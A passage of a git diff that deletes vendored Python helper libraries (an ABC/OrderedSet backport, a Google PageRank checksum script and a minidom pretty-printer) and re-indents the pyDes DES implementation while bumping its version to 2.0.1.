- for name in getattr(base, "__abstractmethods__", set()): - value = getattr(cls, name, None) - if getattr(value, "__isabstractmethod__", False): - abstracts.add(name) - cls.__abstractmethods__ = frozenset(abstracts) - # Set up inheritance registry - cls._abc_registry = set() - cls._abc_cache = set() - cls._abc_negative_cache = set() - cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter - return cls - - def register(cls, subclass): - """Register a virtual subclass of an ABC.""" - if not isinstance(subclass, (type, types.ClassType)): - raise TypeError("Can only register classes") - if issubclass(subclass, cls): - return # Already a subclass - # Subtle: test for cycles *after* testing for "already a subclass"; - # this means we allow X.register(X) and interpret it as a no-op. - if issubclass(cls, subclass): - # This would create a cycle, which is bad for the algorithm below - raise RuntimeError("Refusing to create an inheritance cycle") - cls._abc_registry.add(subclass) - ABCMeta._abc_invalidation_counter += 1 # Invalidate negative cache - - def _dump_registry(cls, file=None): - """Debug helper to print the ABC registry.""" - print >> file, "Class: %s.%s" % (cls.__module__, cls.__name__) - print >> file, "Inv.counter: %s" % ABCMeta._abc_invalidation_counter - for name in sorted(cls.__dict__.keys()): - if name.startswith("_abc_"): - value = getattr(cls, name) - print >> file, "%s: %r" % (name, value) - - def __instancecheck__(cls, instance): - """Override for isinstance(instance, cls).""" - # Inline the cache checking when it's simple. - subclass = getattr(instance, '__class__', None) - if subclass in cls._abc_cache: - return True - subtype = type(instance) - # Old-style instances - if subtype is _InstanceType: - subtype = subclass - if subtype is subclass or subclass is None: - if (cls._abc_negative_cache_version == - ABCMeta._abc_invalidation_counter and - subtype in cls._abc_negative_cache): - return False - # Fall back to the subclass check. - return cls.__subclasscheck__(subtype) - return (cls.__subclasscheck__(subclass) or - cls.__subclasscheck__(subtype)) - - def __subclasscheck__(cls, subclass): - """Override for issubclass(subclass, cls).""" - # Check cache - if subclass in cls._abc_cache: - return True - # Check negative cache; may have to invalidate - if cls._abc_negative_cache_version < ABCMeta._abc_invalidation_counter: - # Invalidate the negative cache - cls._abc_negative_cache = set() - cls._abc_negative_cache_version = ABCMeta._abc_invalidation_counter - elif subclass in cls._abc_negative_cache: - return False - # Check the subclass hook - ok = cls.__subclasshook__(subclass) - if ok is not NotImplemented: - assert isinstance(ok, bool) - if ok: - cls._abc_cache.add(subclass) - else: - cls._abc_negative_cache.add(subclass) - return ok - # Check if it's a direct subclass - if cls in getattr(subclass, '__mro__', ()): - cls._abc_cache.add(subclass) - return True - # Check if it's a subclass of a registered class (recursive) - for rcls in cls._abc_registry: - if issubclass(subclass, rcls): - cls._abc_cache.add(subclass) - return True - # Check if it's a subclass of a subclass (recursive) - for scls in cls.__subclasses__(): - if issubclass(subclass, scls): - cls._abc_cache.add(subclass) - return True - # No dice; update negative cache - cls._abc_negative_cache.add(subclass) - return False - - -def _hasattr(C, attr): - try: - return any(attr in B.__dict__ for B in C.__mro__) - except AttributeError: - # Old-style class - return hasattr(C, attr) - - -class Sized: - __metaclass__ = ABCMeta - - @abstractmethod - def __len__(self): - return 0 - - @classmethod - def __subclasshook__(cls, C): - if cls is Sized: - if _hasattr(C, "__len__"): - return True - return NotImplemented - - -class Container: - __metaclass__ = ABCMeta - - @abstractmethod - def __contains__(self, x): - return False - - @classmethod - def __subclasshook__(cls, C): - if cls is Container: - if _hasattr(C, "__contains__"): - return True - return NotImplemented - - -class Iterable: - __metaclass__ = ABCMeta - - @abstractmethod - def __iter__(self): - while False: - yield None - - @classmethod - def __subclasshook__(cls, C): - if cls is Iterable: - if _hasattr(C, "__iter__"): - return True - return NotImplemented - -Iterable.register(str) - - -class Set(Sized, Iterable, Container): - """A set is a finite, iterable container. - - This class provides concrete generic implementations of all - methods except for __contains__, __iter__ and __len__. - - To override the comparisons (presumably for speed, as the - semantics are fixed), all you have to do is redefine __le__ and - then the other operations will automatically follow suit. - """ - - def __le__(self, other): - if not isinstance(other, Set): - return NotImplemented - if len(self) > len(other): - return False - for elem in self: - if elem not in other: - return False - return True - - def __lt__(self, other): - if not isinstance(other, Set): - return NotImplemented - return len(self) < len(other) and self.__le__(other) - - def __gt__(self, other): - if not isinstance(other, Set): - return NotImplemented - return other < self - - def __ge__(self, other): - if not isinstance(other, Set): - return NotImplemented - return other <= self - - def __eq__(self, other): - if not isinstance(other, Set): - return NotImplemented - return len(self) == len(other) and self.__le__(other) - - def __ne__(self, other): - return not (self == other) - - @classmethod - def _from_iterable(cls, it): - '''Construct an instance of the class from any iterable input. - - Must override this method if the class constructor signature - does not accept an iterable for an input. - ''' - return cls(it) - - def __and__(self, other): - if not isinstance(other, Iterable): - return NotImplemented - return self._from_iterable(value for value in other if value in self) - - def isdisjoint(self, other): - for value in other: - if value in self: - return False - return True - - def __or__(self, other): - if not isinstance(other, Iterable): - return NotImplemented - chain = (e for s in (self, other) for e in s) - return self._from_iterable(chain) - - def __sub__(self, other): - if not isinstance(other, Set): - if not isinstance(other, Iterable): - return NotImplemented - other = self._from_iterable(other) - return self._from_iterable(value for value in self - if value not in other) - - def __xor__(self, other): - if not isinstance(other, Set): - if not isinstance(other, Iterable): - return NotImplemented - other = self._from_iterable(other) - return (self - other) | (other - self) - - # Sets are not hashable by default, but subclasses can change this - __hash__ = None - - def _hash(self): - """Compute the hash value of a set. - - Note that we don't define __hash__: not all sets are hashable. - But if you define a hashable set type, its __hash__ should - call this function. - - This must be compatible __eq__. - - All sets ought to compare equal if they contain the same - elements, regardless of how they are implemented, and - regardless of the order of the elements; so there's not much - freedom for __eq__ or __hash__. We match the algorithm used - by the built-in frozenset type. - """ - MAX = sys.maxint - MASK = 2 * MAX + 1 - n = len(self) - h = 1927868237 * (n + 1) - h &= MASK - for x in self: - hx = hash(x) - h ^= (hx ^ (hx << 16) ^ 89869747) * 3644798167 - h &= MASK - h = h * 69069 + 907133923 - h &= MASK - if h > MAX: - h -= MASK + 1 - if h == -1: - h = 590923713 - return h - -Set.register(frozenset) - - -class MutableSet(Set): - - @abstractmethod - def add(self, value): - """Add an element.""" - raise NotImplementedError - - @abstractmethod - def discard(self, value): - """Remove an element. Do not raise an exception if absent.""" - raise NotImplementedError - - def remove(self, value): - """Remove an element. If not a member, raise a KeyError.""" - if value not in self: - raise KeyError(value) - self.discard(value) - - def pop(self): - """Return the popped value. Raise KeyError if empty.""" - it = iter(self) - try: - value = it.next() - except StopIteration: - raise KeyError - self.discard(value) - return value - - def clear(self): - """This is slow (creates N new iterators!) but effective.""" - try: - while True: - self.pop() - except KeyError: - pass - - def __ior__(self, it): - for value in it: - self.add(value) - return self - - def __iand__(self, it): - for value in (self - it): - self.discard(value) - return self - - def __ixor__(self, it): - if not isinstance(it, Set): - it = self._from_iterable(it) - for value in it: - if value in self: - self.discard(value) - else: - self.add(value) - return self - - def __isub__(self, it): - for value in it: - self.discard(value) - return self - -MutableSet.register(set) - - -class OrderedSet(MutableSet): - - def __init__(self, iterable=None): - self.end = end = [] - end += [None, end, end] # sentinel node for doubly linked list - self.map = {} # key --> [key, prev, next] - if iterable is not None: - self |= iterable - - def __len__(self): - return len(self.map) - - def __contains__(self, key): - return key in self.map - - def __getitem__(self, key): - return list(self)[key] - - def add(self, key): - if key not in self.map: - end = self.end - curr = end[PREV] - curr[NEXT] = end[PREV] = self.map[key] = [key, curr, end] - - def discard(self, key): - if key in self.map: - key, prev, next = self.map.pop(key) - prev[NEXT] = next - next[PREV] = prev - - def __iter__(self): - end = self.end - curr = end[NEXT] - while curr is not end: - yield curr[KEY] - curr = curr[NEXT] - - def __reversed__(self): - end = self.end - curr = end[PREV] - while curr is not end: - yield curr[KEY] - curr = curr[PREV] - - def pop(self, last=True): - if not self: - raise KeyError('set is empty') - key = reversed(self).next() if last else iter(self).next() - self.discard(key) - return key - - def __repr__(self): - if not self: - return '%s()' % (self.__class__.__name__,) - return '%s(%r)' % (self.__class__.__name__, list(self)) - - def __eq__(self, other): - if isinstance(other, OrderedSet): - return len(self) == len(other) and list(self) == list(other) - return set(self) == set(other) - - def __del__(self): - if all([KEY, PREV, NEXT]): - self.clear() # remove circular references - -if __name__ == '__main__': - print(OrderedSet('abracadaba')) - print(OrderedSet('simsalabim')) diff --git a/thirdparty/oset/pyoset.py b/thirdparty/oset/pyoset.py deleted file mode 100644 index 2a67455bc22..00000000000 --- a/thirdparty/oset/pyoset.py +++ /dev/null @@ -1,83 +0,0 @@ -#!/usr/bin/env python -# -*- mode:python; tab-width: 2; coding: utf-8 -*- - -"""Partially backported python ABC classes""" - -from __future__ import absolute_import - -try: - from collections import MutableSet -except ImportError: - # Running in Python <= 2.5 - from ._abc import MutableSet - - -KEY, PREV, NEXT = range(3) - - -class OrderedSet(MutableSet): - - def __init__(self, iterable=None): - self.end = end = [] - end += [None, end, end] # sentinel node for doubly linked list - self.map = {} # key --> [key, prev, next] - if iterable is not None: - self |= iterable - - def __len__(self): - return len(self.map) - - def __contains__(self, key): - return key in self.map - - def __getitem__(self, key): - return list(self)[key] - - def add(self, key): - if key not in self.map: - end = self.end - curr = end[PREV] - curr[NEXT] = end[PREV] = self.map[key] = [key, curr, end] - - def discard(self, key): - if key in self.map: - key, prev, next = self.map.pop(key) - prev[NEXT] = next - next[PREV] = prev - - def __iter__(self): - end = self.end - curr = end[NEXT] - while curr is not end: - yield curr[KEY] - curr = curr[NEXT] - - def __reversed__(self): - end = self.end - curr = end[PREV] - while curr is not end: - yield curr[KEY] - curr = curr[PREV] - - def pop(self, last=True): - if not self: - raise KeyError('set is empty') - key = reversed(self).next() if last else iter(self).next() - self.discard(key) - return key - - def __repr__(self): - if not self: - return '%s()' % (self.__class__.__name__,) - return '%s(%r)' % (self.__class__.__name__, list(self)) - - def __eq__(self, other): - if isinstance(other, OrderedSet): - return len(self) == len(other) and list(self) == list(other) - return set(self) == set(other) - - def __del__(self): - if all([KEY, PREV, NEXT]): - self.clear() # remove circular references - -oset = OrderedSet diff --git a/thirdparty/pagerank/__init__.py b/thirdparty/pagerank/__init__.py deleted file mode 100644 index 67837734347..00000000000 --- a/thirdparty/pagerank/__init__.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python -# -# The MIT License -# -# Copyright 2010 Corey Goldberg -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -# THE SOFTWARE. -# - -pass diff --git a/thirdparty/pagerank/pagerank.py b/thirdparty/pagerank/pagerank.py deleted file mode 100644 index 60a654fd1cc..00000000000 --- a/thirdparty/pagerank/pagerank.py +++ /dev/null @@ -1,78 +0,0 @@ -#!/usr/bin/env python -# -# Script for getting Google Page Rank of page -# Google Toolbar 3.0.x/4.0.x Pagerank Checksum Algorithm -# -# original from http://pagerank.gamesaga.net/ -# this version was adapted from http://www.djangosnippets.org/snippets/221/ -# by Corey Goldberg - 2010 -# -# important update (http://www.seroundtable.com/google-pagerank-change-14132.html) -# by Miroslav Stampar - 2012 -# -# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php - -import urllib - -def get_pagerank(url): - _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url)) - try: - f = urllib.urlopen(_) - rank = f.read().strip()[9:] - except Exception: - rank = 'N/A' - else: - rank = '0' if not rank or not rank.isdigit() else rank - return rank - -def int_str(string_, integer, factor): - for i in xrange(len(string_)) : - integer *= factor - integer &= 0xFFFFFFFF - integer += ord(string_[i]) - - return integer - -def hash_url(string_): - c1 = int_str(string_, 0x1505, 0x21) - c2 = int_str(string_, 0, 0x1003F) - - c1 >>= 2 - c1 = ((c1 >> 4) & 0x3FFFFC0) | (c1 & 0x3F) - c1 = ((c1 >> 4) & 0x3FFC00) | (c1 & 0x3FF) - c1 = ((c1 >> 4) & 0x3C000) | (c1 & 0x3FFF) - - t1 = (c1 & 0x3C0) << 4 - t1 |= c1 & 0x3C - t1 = (t1 << 2) | (c2 & 0xF0F) - - t2 = (c1 & 0xFFFFC000) << 4 - t2 |= c1 & 0x3C00 - t2 = (t2 << 0xA) | (c2 & 0xF0F0000) - - return (t1 | t2) - -def check_hash(hash_int): - hash_str = '%u' % (hash_int) - flag = 0 - check_byte = 0 - - i = len(hash_str) - 1 - while i >= 0: - byte = int(hash_str[i]) - if 1 == (flag % 2): - byte *= 2; - byte = byte / 10 + byte % 10 - check_byte += byte - flag += 1 - i -= 1 - - check_byte %= 10 - if 0 != check_byte: - check_byte = 10 - check_byte - if 1 == flag % 2: - if 1 == check_byte % 2: - check_byte += 9 - check_byte >>= 1 - - return '7' + str(check_byte) + hash_str diff --git a/thirdparty/prettyprint/__init__.py b/thirdparty/prettyprint/__init__.py deleted file mode 100644 index 1f9e1434354..00000000000 --- a/thirdparty/prettyprint/__init__.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python - -#Copyright (c) 2010, Chris Hall -#All rights reserved. - -#Redistribution and use in source and binary forms, with or without modification, -#are permitted provided that the following conditions are met: - -#* Redistributions of source code must retain the above copyright notice, -#this list of conditions and the following disclaimer. -#* Redistributions in binary form must reproduce the above copyright notice, -#this list of conditions and the following disclaimer in the documentation -#and/or other materials provided with the distribution. - -#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR -#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -pass diff --git a/thirdparty/prettyprint/prettyprint.py b/thirdparty/prettyprint/prettyprint.py deleted file mode 100644 index 586d808114a..00000000000 --- a/thirdparty/prettyprint/prettyprint.py +++ /dev/null @@ -1,97 +0,0 @@ -#!/usr/bin/env python - -#Copyright (c) 2010, Chris Hall -#All rights reserved. - -#Redistribution and use in source and binary forms, with or without modification, -#are permitted provided that the following conditions are met: - -#* Redistributions of source code must retain the above copyright notice, -#this list of conditions and the following disclaimer. -#* Redistributions in binary form must reproduce the above copyright notice, -#this list of conditions and the following disclaimer in the documentation -#and/or other materials provided with the distribution. - -#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR -#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -from xml.dom import minidom -from xml.dom import Node - -def format(text): - doc = minidom.parseString(text) - root = doc.childNodes[0] - return root.toprettyxml(indent=' ') - -def formatXML(doc, encoding=None): - root = doc.childNodes[0] - return root.toprettyxml(indent=' ', encoding=encoding) - -def _patch_minidom(): - minidom.Text.writexml = _writexml_text - minidom.Element.writexml = _writexml_element - minidom.Node.toprettyxml = _toprettyxml_node - -def _collapse(node): - for child in node.childNodes: - if child.nodeType == Node.TEXT_NODE and len(child.data.strip()) == 0: - child.data = '' - else: - _collapse(child) - -def _writexml_text(self, writer, indent="", addindent="", newl=""): - minidom._write_data(writer, "%s"%(self.data.strip())) - -def _writexml_element(self, writer, indent="", addindent="", newl=""): - # indent = current indentation - # addindent = indentation to add to higher levels - # newl = newline string - writer.write(indent+"<" + self.tagName) - - attrs = self._get_attributes() - a_names = attrs.keys() - a_names.sort() - - for a_name in a_names: - writer.write(" %s=\"" % a_name) - minidom._write_data(writer, attrs[a_name].value) - writer.write("\"") - if self.childNodes: - if self.childNodes[0].nodeType == Node.TEXT_NODE and len(self.childNodes[0].data) > 0: - writer.write(">") - else: - writer.write(">%s"%(newl)) - for node in self.childNodes: - node.writexml(writer,indent+addindent,addindent,newl) - if self.childNodes[-1].nodeType == Node.TEXT_NODE and len(self.childNodes[0].data) > 0: - writer.write("%s" % (self.tagName,newl)) - else: - writer.write("%s%s" % (indent,self.tagName,newl)) - else: - writer.write("/>%s"%(newl)) - -def _toprettyxml_node(self, indent="\t", newl="\n", encoding = None): - _collapse(self) - # indent = the indentation string to prepend, per level - # newl = the newline string to append - writer = minidom._get_StringIO() - if encoding is not None: - import codecs - # Can't use codecs.getwriter to preserve 2.0 compatibility - writer = codecs.lookup(encoding)[3](writer) - if self.nodeType == Node.DOCUMENT_NODE: - # Can pass encoding only to document, to put it into XML header - self.writexml(writer, "", indent, newl, encoding) - else: - self.writexml(writer, "", indent, newl) - return writer.getvalue() - -_patch_minidom() diff --git a/thirdparty/pydes/pyDes.py b/thirdparty/pydes/pyDes.py index 13e55925097..5322bf10cf9 100644 --- a/thirdparty/pydes/pyDes.py +++ b/thirdparty/pydes/pyDes.py @@ -1,10 +1,10 @@ ############################################################################# -# Documentation # +# Documentation # ############################################################################# # Author: Todd Whiteman # Date: 16th March, 2009 -# Verion: 2.0.0 +# Version: 2.0.1 # License: Public Domain - free to do as you wish # Homepage: http://twhiteman.netfirms.com/des.html # @@ -32,15 +32,15 @@ pyDes.triple_des(key, [mode], [IV], [pad], [padmode]) key -> Bytes containing the encryption key. 8 bytes for DES, 16 or 24 bytes - for Triple DES + for Triple DES mode -> Optional argument for encryption type, can be either - pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining) + pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining) IV -> Optional Initial Value bytes, must be supplied if using CBC mode. - Length must be 8 bytes. + Length must be 8 bytes. pad -> Optional argument, set the pad character (PAD_NORMAL) to use during - all encrypt/decrpt operations done with this instance. + all encrypt/decrpt operations done with this instance. padmode -> Optional argument, set the padding mode (PAD_NORMAL or PAD_PKCS5) - to use during all encrypt/decrpt operations done with this instance. + to use during all encrypt/decrpt operations done with this instance. I recommend to use PAD_PKCS5 padding, as then you never need to worry about any padding issues, as the padding can be removed unambiguously upon decrypting @@ -53,12 +53,12 @@ data -> Bytes to be encrypted/decrypted pad -> Optional argument. Only when using padmode of PAD_NORMAL. For - encryption, adds this characters to the end of the data block when - data is not a multiple of 8 bytes. For decryption, will remove the - trailing characters that match this pad character from the last 8 - bytes of the unencrypted data block. + encryption, adds this characters to the end of the data block when + data is not a multiple of 8 bytes. For decryption, will remove the + trailing characters that match this pad character from the last 8 + bytes of the unencrypted data block. padmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL - or PAD_PKCS5). Defaults to PAD_NORMAL. + or PAD_PKCS5). Defaults to PAD_NORMAL. Example @@ -90,8 +90,8 @@ _pythonMajorVersion = sys.version_info[0] # Modes of crypting / cyphering -ECB = 0 -CBC = 1 +ECB = 0 +CBC = 1 # Modes of padding PAD_NORMAL = 1 @@ -105,754 +105,748 @@ # The base class shared by des and triple des. class _baseDes(object): - def __init__(self, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): - if IV: - IV = self._guardAgainstUnicode(IV) - if pad: - pad = self._guardAgainstUnicode(pad) - self.block_size = 8 - # Sanity checking of arguments. - if pad and padmode == PAD_PKCS5: - raise ValueError("Cannot use a pad character with PAD_PKCS5") - if IV and len(IV) != self.block_size: - raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") - - # Set the passed in variables - self._mode = mode - self._iv = IV - self._padding = pad - self._padmode = padmode - - def getKey(self): - """getKey() -> bytes""" - return self.__key - - def setKey(self, key): - """Will set the crypting key for this object.""" - key = self._guardAgainstUnicode(key) - self.__key = key - - def getMode(self): - """getMode() -> pyDes.ECB or pyDes.CBC""" - return self._mode - - def setMode(self, mode): - """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" - self._mode = mode - - def getPadding(self): - """getPadding() -> bytes of length 1. Padding character.""" - return self._padding - - def setPadding(self, pad): - """setPadding() -> bytes of length 1. Padding character.""" - if pad is not None: - pad = self._guardAgainstUnicode(pad) - self._padding = pad - - def getPadMode(self): - """getPadMode() -> pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" - return self._padmode - - def setPadMode(self, mode): - """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" - self._padmode = mode - - def getIV(self): - """getIV() -> bytes""" - return self._iv - - def setIV(self, IV): - """Will set the Initial Value, used in conjunction with CBC mode""" - if not IV or len(IV) != self.block_size: - raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") - IV = self._guardAgainstUnicode(IV) - self._iv = IV - - def _padData(self, data, pad, padmode): - # Pad data depending on the mode - if padmode is None: - # Get the default padding mode. - padmode = self.getPadMode() - if pad and padmode == PAD_PKCS5: - raise ValueError("Cannot use a pad character with PAD_PKCS5") - - if padmode == PAD_NORMAL: - if len(data) % self.block_size == 0: - # No padding required. - return data - - if not pad: - # Get the default padding. - pad = self.getPadding() - if not pad: - raise ValueError("Data must be a multiple of " + str(self.block_size) + " bytes in length. Use padmode=PAD_PKCS5 or set the pad character.") - data += (self.block_size - (len(data) % self.block_size)) * pad - - elif padmode == PAD_PKCS5: - pad_len = 8 - (len(data) % self.block_size) - if _pythonMajorVersion < 3: - data += pad_len * chr(pad_len) - else: - data += bytes([pad_len] * pad_len) - - return data - - def _unpadData(self, data, pad, padmode): - # Unpad data depending on the mode. - if not data: - return data - if pad and padmode == PAD_PKCS5: - raise ValueError("Cannot use a pad character with PAD_PKCS5") - if padmode is None: - # Get the default padding mode. - padmode = self.getPadMode() - - if padmode == PAD_NORMAL: - if not pad: - # Get the default padding. - pad = self.getPadding() - if pad: - data = data[:-self.block_size] + \ - data[-self.block_size:].rstrip(pad) - - elif padmode == PAD_PKCS5: - if _pythonMajorVersion < 3: - pad_len = ord(data[-1]) - else: - pad_len = data[-1] - data = data[:-pad_len] - - return data - - def _guardAgainstUnicode(self, data): - # Only accept byte strings or ascii unicode values, otherwise - # there is no way to correctly decode the data into bytes. - if _pythonMajorVersion < 3: - if isinstance(data, unicode): - data = data.encode('utf8') - else: - if isinstance(data, str): - # Only accept ascii unicode values. - try: - return data.encode('ascii') - except UnicodeEncodeError: - pass - raise ValueError("pyDes can only work with encoded strings, not Unicode.") - return data + def __init__(self, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): + if IV: + IV = self._guardAgainstUnicode(IV) + if pad: + pad = self._guardAgainstUnicode(pad) + self.block_size = 8 + # Sanity checking of arguments. + if pad and padmode == PAD_PKCS5: + raise ValueError("Cannot use a pad character with PAD_PKCS5") + if IV and len(IV) != self.block_size: + raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") + + # Set the passed in variables + self._mode = mode + self._iv = IV + self._padding = pad + self._padmode = padmode + + def getKey(self): + """getKey() -> bytes""" + return self.__key + + def setKey(self, key): + """Will set the crypting key for this object.""" + key = self._guardAgainstUnicode(key) + self.__key = key + + def getMode(self): + """getMode() -> pyDes.ECB or pyDes.CBC""" + return self._mode + + def setMode(self, mode): + """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" + self._mode = mode + + def getPadding(self): + """getPadding() -> bytes of length 1. Padding character.""" + return self._padding + + def setPadding(self, pad): + """setPadding() -> bytes of length 1. Padding character.""" + if pad is not None: + pad = self._guardAgainstUnicode(pad) + self._padding = pad + + def getPadMode(self): + """getPadMode() -> pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" + return self._padmode + + def setPadMode(self, mode): + """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" + self._padmode = mode + + def getIV(self): + """getIV() -> bytes""" + return self._iv + + def setIV(self, IV): + """Will set the Initial Value, used in conjunction with CBC mode""" + if not IV or len(IV) != self.block_size: + raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") + IV = self._guardAgainstUnicode(IV) + self._iv = IV + + def _padData(self, data, pad, padmode): + # Pad data depending on the mode + if padmode is None: + # Get the default padding mode. + padmode = self.getPadMode() + if pad and padmode == PAD_PKCS5: + raise ValueError("Cannot use a pad character with PAD_PKCS5") + + if padmode == PAD_NORMAL: + if len(data) % self.block_size == 0: + # No padding required. + return data + + if not pad: + # Get the default padding. + pad = self.getPadding() + if not pad: + raise ValueError("Data must be a multiple of " + str(self.block_size) + " bytes in length. Use padmode=PAD_PKCS5 or set the pad character.") + data += (self.block_size - (len(data) % self.block_size)) * pad + + elif padmode == PAD_PKCS5: + pad_len = 8 - (len(data) % self.block_size) + if _pythonMajorVersion < 3: + data += pad_len * chr(pad_len) + else: + data += bytes([pad_len] * pad_len) + + return data + + def _unpadData(self, data, pad, padmode): + # Unpad data depending on the mode. + if not data: + return data + if pad and padmode == PAD_PKCS5: + raise ValueError("Cannot use a pad character with PAD_PKCS5") + if padmode is None: + # Get the default padding mode. + padmode = self.getPadMode() + + if padmode == PAD_NORMAL: + if not pad: + # Get the default padding. + pad = self.getPadding() + if pad: + data = data[:-self.block_size] + \ + data[-self.block_size:].rstrip(pad) + + elif padmode == PAD_PKCS5: + if _pythonMajorVersion < 3: + pad_len = ord(data[-1]) + else: + pad_len = data[-1] + data = data[:-pad_len] + + return data + + def _guardAgainstUnicode(self, data): + # Only accept byte strings or ascii unicode values, otherwise + # there is no way to correctly decode the data into bytes. + if _pythonMajorVersion < 3: + if isinstance(data, unicode): + raise ValueError("pyDes can only work with bytes, not Unicode strings.") + else: + if isinstance(data, str): + # Only accept ascii unicode values. + try: + return data.encode('ascii') + except UnicodeEncodeError: + pass + raise ValueError("pyDes can only work with encoded strings, not Unicode.") + return data ############################################################################# -# DES # +# DES # ############################################################################# class des(_baseDes): - """DES encryption/decrytpion class - - Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. - - pyDes.des(key,[mode], [IV]) - - key -> Bytes containing the encryption key, must be exactly 8 bytes - mode -> Optional argument for encryption type, can be either pyDes.ECB - (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) - IV -> Optional Initial Value bytes, must be supplied if using CBC mode. - Must be 8 bytes in length. - pad -> Optional argument, set the pad character (PAD_NORMAL) to use - during all encrypt/decrpt operations done with this instance. - padmode -> Optional argument, set the padding mode (PAD_NORMAL or - PAD_PKCS5) to use during all encrypt/decrpt operations done - with this instance. - """ - - - # Permutation and translation tables for DES - __pc1 = [56, 48, 40, 32, 24, 16, 8, - 0, 57, 49, 41, 33, 25, 17, - 9, 1, 58, 50, 42, 34, 26, - 18, 10, 2, 59, 51, 43, 35, - 62, 54, 46, 38, 30, 22, 14, - 6, 61, 53, 45, 37, 29, 21, - 13, 5, 60, 52, 44, 36, 28, - 20, 12, 4, 27, 19, 11, 3 - ] - - # number left rotations of pc1 - __left_rotations = [ - 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 - ] - - # permuted choice key (table 2) - __pc2 = [ - 13, 16, 10, 23, 0, 4, - 2, 27, 14, 5, 20, 9, - 22, 18, 11, 3, 25, 7, - 15, 6, 26, 19, 12, 1, - 40, 51, 30, 36, 46, 54, - 29, 39, 50, 44, 32, 47, - 43, 48, 38, 55, 33, 52, - 45, 41, 49, 35, 28, 31 - ] - - # initial permutation IP - __ip = [57, 49, 41, 33, 25, 17, 9, 1, - 59, 51, 43, 35, 27, 19, 11, 3, - 61, 53, 45, 37, 29, 21, 13, 5, - 63, 55, 47, 39, 31, 23, 15, 7, - 56, 48, 40, 32, 24, 16, 8, 0, - 58, 50, 42, 34, 26, 18, 10, 2, - 60, 52, 44, 36, 28, 20, 12, 4, - 62, 54, 46, 38, 30, 22, 14, 6 - ] - - # Expansion table for turning 32 bit blocks into 48 bits - __expansion_table = [ - 31, 0, 1, 2, 3, 4, - 3, 4, 